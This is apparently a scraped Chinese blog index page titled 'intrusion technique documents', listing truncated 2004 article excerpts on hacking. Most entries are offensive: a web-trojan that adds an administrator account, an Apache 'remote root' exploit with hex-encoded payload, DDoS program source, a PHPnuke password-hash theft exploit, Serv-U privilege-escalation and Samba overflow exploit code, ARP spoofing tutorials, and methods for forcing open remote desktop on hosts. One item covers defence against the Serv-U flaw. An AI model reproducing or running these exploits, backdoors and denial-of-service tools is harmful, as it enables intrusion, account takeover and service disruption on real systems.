入侵技术文档
文章平均质量分 67
superhacker110
这个作者很懒,什么都没留下…
展开
-
这几天有关网页木马的问题很多,现在介绍一个详细的使用过程:
---------------------------------------------一、建立用户--------------------------------------------------------------------1,在你的web目录下新建一个网页add.htm,代码如下This is a add user program!Its will add an administ原创 2004-11-05 01:10:00 · 1481 阅读 · 1 评论 -
创建SvcHost.exe调用的服务原理与实践
创建SvcHost.exe调用的服务原理与实践 1. 多个服务共享一个Svchost.exe进程利与弊 windows 系统服务分为独立进程和共享进程两种,在windows NT时只有服务器管理器SCM(Services.exe)有多个共享服务,随着系统内置服务的增加,在windows 2000中ms又把很多服务做成共享方式,由svchost.exe启动。windows 2000一般有原创 2004-11-30 00:46:00 · 1460 阅读 · 0 评论 -
手把手教你玩转ARP包(完)【数据包的游戏系列之一】
手把手教你玩转ARP包(完)【数据包的游戏系列之一】 作者: CSDN VC/MFC 网络编程 PiggyXP ^_^ 本篇目录: 四。ARP包的游戏 1 . 小伎俩 2. ARP欺骗的实现 3. 基于ARP欺骗的监听原理 四.ARP包的游戏既然我们可以自己来填充数据包,那原创 2004-11-30 00:39:00 · 1751 阅读 · 0 评论 -
手把手教你玩转ARP包(三)【数据包的游戏系列之一】
手把手教你玩转ARP包(三)【数据包的游戏系列之一】 作者:CSDN VC/MFC 网络编程 PiggyXP ^_^ 目录: 二。发送数据包的编程实现 1. 填充数据包 2. 发送数据包三。一些附加步骤及说明 1. 如果在VC中使用winpcap 2. 获得网卡信息列表 3. 获得系统ARP信息列表原创 2004-11-30 00:38:00 · 1486 阅读 · 0 评论 -
手把手教你玩转ARP包(一)【数据包的游戏系列之一】
手把手教你玩转ARP包(一)【数据包的游戏系列之一】 前 言 首先要感谢网络安全资深专家卢湖川博士以及VC网络版的limin朋友提供的资料以及帮助^_^经常看到论坛有人问起关于数据包的截获、分析等问题,幸好本人也对此略有所知,所以就想写一系列的文章来详细深入的探讨关于数据包的知识,,我希望通过这一系列的文章,能使得关于数据包的知识得以普及,所以这系列的每一篇文章我原创 2004-11-30 00:40:00 · 1847 阅读 · 0 评论 -
Serv-u Ftp Server 本地权限提升漏洞的终极防御
Serv-u Ftp server(以下简称Serv-u)是一个应用比较广泛的Ftp Server,功能强大,使用方便,Serv-u>3.x版本存在本地权限提升漏洞,使用guest权限结合Exp可以以system权限运行程序,通过Webshell结合Exp提升权限已经成了很常用提升方法。漏洞简介: 漏洞是使用Serv-u本地默认管理端口,以默认管理员登陆新建域和用户来执行命令,Ser原创 2004-11-27 00:50:00 · 1253 阅读 · 0 评论 -
手把手教你玩转ARP包(二)【数据包的游戏系列之一】
作者: CSDN VC/MFC 网络编程 PiggyXP ^_^ 目录: 一. 关于ARP协议的基础知识 3. ARP包的填充二。发送数据包的编程实现 1.填充数据包 .........................紧接上文............................ 3.ARP包的填充1) 请求原创 2004-11-30 00:37:00 · 963 阅读 · 0 评论 -
Serv-U ftp server 密码算法
测试环境:SERV-U 4.1 & 5.0 & 5.004测试结果:测试通过测试方法:输入明文后点提交,而后将下面文本框中的散列复制下来,粘贴到Serv-U的ServUDaemon.ini文件中,而后重新启动Serv-u服务。即可测试密码是否正确。测试时发现,直接在INI文件中添加的账户,无须启动SERV-U即可登陆,但如果你同时添加了一些虚拟目录的话,虚拟目录需要服务器重起时才能生效。另外,如果原创 2004-11-27 00:51:00 · 1105 阅读 · 0 评论 -
手把手教你捕获数据包(下)【数据包的游戏系列之二】
B. 打开相应网卡并设置为混杂模式: 在此之前肯定要有一段让用户选择网卡、并获得用户选择的网卡的名字的代码,既然上面已经可以获得所有网卡的名字了,这段代码就暂且略过了。 我们主要是要用到 pcap_open_live 函数,不过这个函数winpcap的开发小组已经建议用pcap_open 函数来代替,不过因为我的代码里面用的就是pcap_open_live,所以也不便于修改了,不过原创 2004-11-30 00:35:00 · 977 阅读 · 1 评论 -
手把手教你捕获数据包(上)【数据包的游戏系列之二】
手把手教你捕获数据包(上)【数据包的游戏系列之二】 前 言 经常看到论坛有人问起关于数据包的截获、分析等问题,幸好本人也对此略有所知,也写过很多的sniffer,所以就想写一系列的文章来详细深入的探讨关于数据包的知识。我希望通过这一系列的文章,能使得关于数据包的知识得以普及,所以这系列的每一篇文章我都会有由浅入深的解释、详细的分析、以及编码步骤,另外附上带有详细注释的源码原创 2004-11-30 00:33:00 · 1144 阅读 · 0 评论 -
Linux内核文件offset指针敏感信息泄露漏洞
Linux内核文件offset指针敏感信息泄露漏洞 受影响系统: Linux kernel 2.6.7Linux kernel 2.6.6Linux kernel 2.6.5Linux kernel 2.6.4Linux kernel 2.6.3Linux kernel 2.6.2Linux kernel 2.6.1Linux kernel 2.6Linux kernel 2.4.9Linux原创 2004-11-24 00:43:00 · 771 阅读 · 0 评论 -
Apache/1.3.29 - Remote Root Exploit
Apache/1.3.29 - Remote Root Exploit unsigned char h3llc0de[]={ 0x23, 0x21, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x70, 0x65, 0x72, 0x6c, 0x0a, 0x0a, 0x24, 0x63, 0x68, 0x61, 0x6e, 0x3d,原创 2004-11-24 00:42:00 · 941 阅读 · 0 评论 -
DDOS程序源代码
DOS.c /******************** DOS.c *****************/ #include #include #include #include #include #include #include #include #include #define DESTPORT 80 /* 要攻击的端口(WEB) */ #define LOCALPORT 8原创 2004-11-24 00:38:00 · 836 阅读 · 0 评论 -
PHPnuke 6.x_exp and 5.x_exp
#!/usr/bin/php -qPHPnuke 6.x and 5.x fetch author hash by pokleyzz /*# PHPnuke 6.x and 5.x fetch author hash by pokleyzz # 27th December 2003 : 4:54 a.m## bug found by pokleyzz (11th December 2003 )原创 2004-11-24 00:33:00 · 845 阅读 · 0 评论 -
SERV-U本地溢出源代码
RhinoSoft Serv-U 5.1.0.0RhinoSoft Serv-U 5.0.0.9RhinoSoft Serv-U 5.0.0.4RhinoSoft Serv-U 5.0RhinoSoft Serv-U 4.1.0.3RhinoSoft Serv-U 4.1.0.11RhinoSoft Serv-U 4.0.0.4RhinoSoft Serv-U 4.0.0.0RhinoSoft原创 2004-11-24 00:30:00 · 995 阅读 · 0 评论 -
Samba 3.x SWAT预验证远程缓冲区溢出漏洞[代码]
Samba 3.x SWAT预验证远程缓冲区溢出漏洞[代码] 受影响系统 Samba 3.0.2 Samba 3.0.3 Samba 3.0.4详细描述SWAT是Samba Web管理工具。 Samba SWAT服务预验证存在缓冲区溢出问题,远程攻击者可以利用这个漏洞在系统上以SWAT进程权限执行任意指令。问题存在于sourc原创 2004-11-24 00:39:00 · 720 阅读 · 0 评论 -
Tskill(结束进程)
结束进程命令Tskill(结束进程)tskill {processid | processname} [/server:servername] [/id:sessionid | /a] [/v]参数processid要结束的进程的 ID。processname要结束的进程的名称。可以使用通配符指定该参数。/server:servername指定包原创 2004-11-06 00:58:00 · 2396 阅读 · 0 评论 -
开3389的五种方法!
---------------------------------------------第一种方法:使用的工具:1:ipcscan扫描器2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IP:Port )3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品)4:cscript (在system32文件夹下;98操作系统原创 2004-11-05 01:12:00 · 1353 阅读 · 1 评论